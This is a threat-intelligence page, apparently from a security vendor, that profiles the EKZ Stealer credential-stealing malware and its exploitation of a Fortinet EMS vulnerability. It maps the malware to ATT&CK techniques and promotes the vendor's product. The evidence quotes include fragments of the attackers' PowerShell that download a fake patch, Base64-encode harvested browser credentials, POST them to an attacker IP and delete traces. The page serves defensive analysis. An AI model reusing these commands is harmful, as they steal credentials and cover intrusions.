MalwareExploits 1 CVE

EKZ Stealer

For your environment

Hunt this family in your stack

Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.

Start free trial

EXPLOITED CVES

Vulnerabilities exploited

1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.

1 CVES

CVE-2026-35616Unauthenticated Authentication Bypass in Fortinet FortiClient EMSExploited in the wild

Further investigation revealed exploitation of CVE-2026-35616, an improper access control vulnerability affecting Fortinet EMS versions 7.4.5 through 7.4.6. | In May 2026, eSentire's Threat Response Unit (TRU) detected EKZ Stealer within a customer environment... threat actors exploited CVE-2026-35616 in Fortinet EMS ... and was used to harvest browser credentials from Chromium-based browsers and Firefox, before exfiltration by PowerShell.

via esentire blogesentire.com

MITRE ATT&CK

Techniques & procedures

14 distinct techniques documented for this family, organized by ATT&CK tactic.

Initial Access

1 technique

T1190Exploit Public-Facing ApplicationEvidence1

The attack chain begins with threat actors compromising a Fortinet EMS server through CVE-2026-35616, then deploying EKZ Stealer and exfiltrating harvested credentials using PowerShell.

Execution

2 techniques

T1059Command and Scripting InterpreterEvidence1

The decoded PowerShell can be seen in the code snippet below.

T1059.001PowerShellEvidence1

the stolen credentials are sent in the body via HTTP POST request (base64 encoded).

Stealth

5 techniques

T1027Obfuscated Files or InformationEvidence1

EKZ Stealer's compiler-based obfuscations (indirect jumps/calls + control-flow flattening) are deobfuscated using Binary Ninja Workflows

T1036MasqueradingEvidence1

we decoded the PowerShell command ... found that it downloads EKZ Infostealer, disguises it as a Fortinet update (FortiEndpoint_Patch.exe), and executes it.

T1070Indicator RemovalEvidence1

del C:\programdata\log.txt;del C:\programdata\FortiEndpoint_Patch.exe;

T1070.004File DeletionEvidence1

del C:\programdata\log.txt;del C:\programdata\FortiEndpoint_Patch.exe;

T1497Virtualization/Sandbox EvasionEvidence1

It then sleeps for 90 seconds to allow the malware to write collected credentials to C:\ProgramData\log.txt , before exfiltrating that file

Credential Access

2 techniques

T1555Credentials from Password StoresEvidence1

was used to harvest browser credentials from Chromium-based browsers and Firefox

T1555.003Credentials from Web BrowsersEvidence1

The file was compiled with MinGW/GCC and statically links open-source libraries used to extract credentials from Chromium-based browsers and Firefox.

Discovery

1 technique

T1497Virtualization/Sandbox EvasionEvidence1

It then sleeps for 90 seconds to allow the malware to write collected credentials to C:\ProgramData\log.txt , before exfiltrating that file

Collection

1 technique

T1560Archive Collected DataEvidence1

$b=[Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\programdata\log.txt"));

Command and Control

2 techniques

T1105Ingress Tool TransferEvidence1

$wc = New-Object System.Net.WebClient;$wc.DownloadFile($Url, $Out);

T1132Data EncodingEvidence1

Within a Wireshark capture, the stolen credentials are sent in the body via HTTP POST request (base64 encoded).

Exfiltration

1 technique

T1048.003Exfiltration Over Unencrypted Non-C2 ProtocolEvidence1

$wc.UploadString("hxxp://83.138.53[.]110/service/save.php","POST",$b);

INDICATORS OF COMPROMISE

IOCs tracked for this family

4 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.

View more in app

Network

1 tracked

IPs, domains, and DNS infrastructure linked to this family.

Hashes

1 tracked

File hashes (MD5, SHA-1, SHA-256) from samples and reports.

Other

2 tracked

Other indicator types observed in public reporting.

TypeValueLatest sighting

hash.sha256●●●●●●●●●●●●View more in app6 days ago

ip.v4●●●●●●●●●●●●View more in app6 days ago

uri●●●●●●●●●●●●View more in app6 days ago

ACTIVITY FEED

Recent activity

1 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

1 SOURCESView more in app

esentire blogNews

Jun 25, 2026

Fortinet Vulnerability CVE-2026-35616 and EKZ Stealer, Attacking Obfuscating Compilers with Binary Ninja Workflows | eSentire

Credential-stealing malware delivered as a fake Fortinet patch (FortiEndpoint_Patch.exe). It harvests browser credentials from Chromium-based browsers and Firefox, writes them to log.txt, and the stolen data is then exfiltrated via a Base64-encoded HTTP POST request. The sample also uses compiler-based obfuscation including indirect jumps/calls, control-flow flattening, and XOR-based string encryption.

What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.

Start free trial

IOC matching4

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities1

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping14

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.